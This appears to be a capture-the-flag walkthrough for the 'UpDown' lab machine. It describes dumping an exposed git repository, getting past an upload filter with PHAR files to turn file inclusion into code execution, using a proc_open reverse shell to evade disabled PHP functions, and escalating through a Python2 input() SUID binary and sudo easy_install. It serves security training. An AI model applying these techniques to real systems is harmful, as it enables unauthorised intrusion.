UpDown
LFI to RCE using PHAR files while bypassing disabled_functions, followed by abuse of SUID and sudo.
Last updated
LFI to RCE using PHAR files while bypassing disabled_functions, followed by abuse of SUID and sudo.
Last updated
As per usual, we knock out a quick nmap
:
It appears to be running Apache
on Ubuntu
, including a webserber titled Is My Website Up?
A quick look on the IP gives us a basic page. It appears to be an application that checks for you whether or not a website it up:
We can see at the bottom that siteisup.htb
is the domain, so we add it to /etc/hosts
. The website we are served, however, is still the same.
I listen with sudo nc -nvlp 80
but if we put in our IP, we get an interesting message:
If we put in http://
it works, though. There is probably some check to detect the protocol the request uses. It does appear to just be a GET request
Nothing of note here, except confirmation that the domain is siteisup.htb
. On the website there is a massive delay and it says it's down:
This makes sense as we are not sending a response, so it has no way of telling. If we instead serve port 80 with a python SimpleHTTPServer
, which has a response, we are told it's up:
There is once again no additional data:
If we turn on Debug Mode
, the website prints out the headers and the HTML data.
We can also realise that we can use http://127.0.0.1
as input so SSRF could be possible. If we try and use other wrappers like file://
or php://
then it breaks and we get the Hacking attempt was detected ! message again.
It's not all wrappers that get blocked, as ippsec showed in his video, as ftp
and gopher
both work fine.
We can run some brute force scripts in the background for files and directories while we probe manually:
Gobuster detects that there is a /dev
directory! This looks like the only useful thing it finds, as basically everything else is status code 403
. Connection to /dev
just loads up a blank page with no information.
But what if we bruteforce under /dev
? In fact, we hit the jackpot - there's a .git
directory!
We'll use a tool called git-dumper
to dump the contents of the Git repo:
The contents are interesting. First we see index.php
, which looks like this:
Essentially, it checks the page
parameter; if it doesn't contain strings like bin
or etc
, it will append .php
to the end and serve it back. If it does, it simply renders checker.php
. checker.php
is the file for the main page we see on a normal connectiong, which checks if a website is up or not.
There is clearly LFI here, but made slightly more difficult by the blacklist and the addition of .php
onto the end of a filename.
Additionally, we can dump more details from Git using the git log
command. A couple of intersting commits come up if that happens:
There is very potentially some interesting information in .htpasswd
and .htaccess
, and the mention of a dev
vhost is useful too - there may be a dev.siteisup.htb
. We'll add this to our hosts file, but if we try to connect, it tells us it's Forbidden
to access that resource. We've at least confirmed that the subdomain exists and is treated differently.
If we checkout the commit 8812785e31c879261050e72e20f298ae8c43b565
using git checkout
, we can see that .htpasswd
exists, but it's empty:
.htaccess
is much more intersting:
This tells us there is a special header that needs to be set called Special-Dev
with the value only4dev
. COnsidering the description of the commit is New technique in header to protect our dev vhost
and dev.siteisup.htb
is Forbidden, it's likely for that. We can check using BurpSuite:
And it looks like it is!
To make it easier for us, we're gonna get BurpSuite to add the header for us with its proxy (thanks to ippsec for this!). We can go to Match and Replace
under Proxy Options:
And we can access it successfully in the browser:
Fiddling around with the website, we realise it reflects the git repository perfectly - the hyperlink for the Admin Page adds ?page=admin
to the request, which then spits out the contents of admin.php
. Clearly, the LFI works.
A logical route here would be to upload our own file and then LFI it for RCE. However, there are two issues with this.
Firstly, the server checks the file extension, and denies uploading a fair few of them:
Secondly, the server appends .php
to the page
parameter of the GET request:
We have to somehow bypass these restrictions to get proper LFI.
If we have a proper look at the code, we realise that it all happens very quickly:
So after all the checks, it:
Uploads it to uploads/
, under a folder by time
Reads all the lines in the file, putting them into a list
Queries each element of the list to see if it's up
Deletes the file
So it seems like it expects a list of websites to check, then once that's done deletes them immediately.
Note that if the webserver doesn't respond, it hangs for a period of time - this is the massive delay we noticed right away. We can use this to our advantage and keep the server running, leaving the file up.
We make a very simple test.php
:
As we predicted, the server rejects the file. If we rename it to test.txt
and try again, the upload is successful. If we go to http://dev.siteisup.htb/uploads/
, we see the file gets deleted immediately. Let's add our own IP and see if it hangs long enough for us to actually get it:
Still nothing. The resposne is very quick on the original site, so it probably detected the socket was closed. If we open the socket but don't respond, for example with netcat
, it might delay:
And now if we run over to uploads
we can see the file!
We can actually also add the -k
flag to the above nc
command to keep the listening persist over multiple connections. I'll have this running in the background while I tinker with what can be done.
PHP has its own archives called phar files, where you essentially package up PHP files into a zip file. The cool thing about a phar file is that we can use the phar://
stream wrapper to access a PHP script inside the phar file.
The way this works is that we can have a file with the .php
extension, then in the page
parameter of the GET request we can use the phar://
wrapper to access the PHP file inside it.
We'll make test.php
really simple to start with:
We then compress it into a phar file:
The upload works! Let's try and access the file itself. In BurpSuite, we'll use Repeater to query for the file. Note that the server appends the .php
for us - that's half the reason we have to do it this way! So don't include the extension in the page
parameter.
It worked! Now let's do a crazier command, like system("ls")
:
Huh, it's an Internal Server Error. Considering that the previous attempt worked well, chances are some PHP functions are disabled. This is done using disabled_functions
, and we can check by running phpinfo()
, so let's do that:
There are a lot of disabled functions, but one that is not disabled is proc_open()
. This can be found using the tool dfunc-bypasser, as recommended by ippsec and 0xdf. A proc_open()
reverse shell can be pretty simple:
A basic reverse shell to port 4000. Let's do the exact same thing and pray it works.
Which it does! We upgrade the shell quickly using
A quick check in /home
tells us there is a developer
user. If we go into their home directory then /dev
, there is a SUID binary named siteisup
with the source code siteisup.py
. We can read siteisup.py
:
We can immediately spot this is python2, and even more importantly it's using input()
in python2 - which can easily lead to code execution. If we run ./siteisup
, we get prompted for the URL. If we enter a simple os.system
command, we get a response:
Aside from the errors, we can see it works! Now we can run __import__('os').system('bash')
and get a shell as developer
. I'll grab the id_rsa
in .ssh
, call it dev.key and SSH in:
And now we have a shell as developer
and can read user.txt
!
We can check our sudo
permissions:
We have sudo
permissions to run easy_install
. We can use GTFOBins to find an easy sudo privesc for easy_install
:
And from there we easily read root.txt
.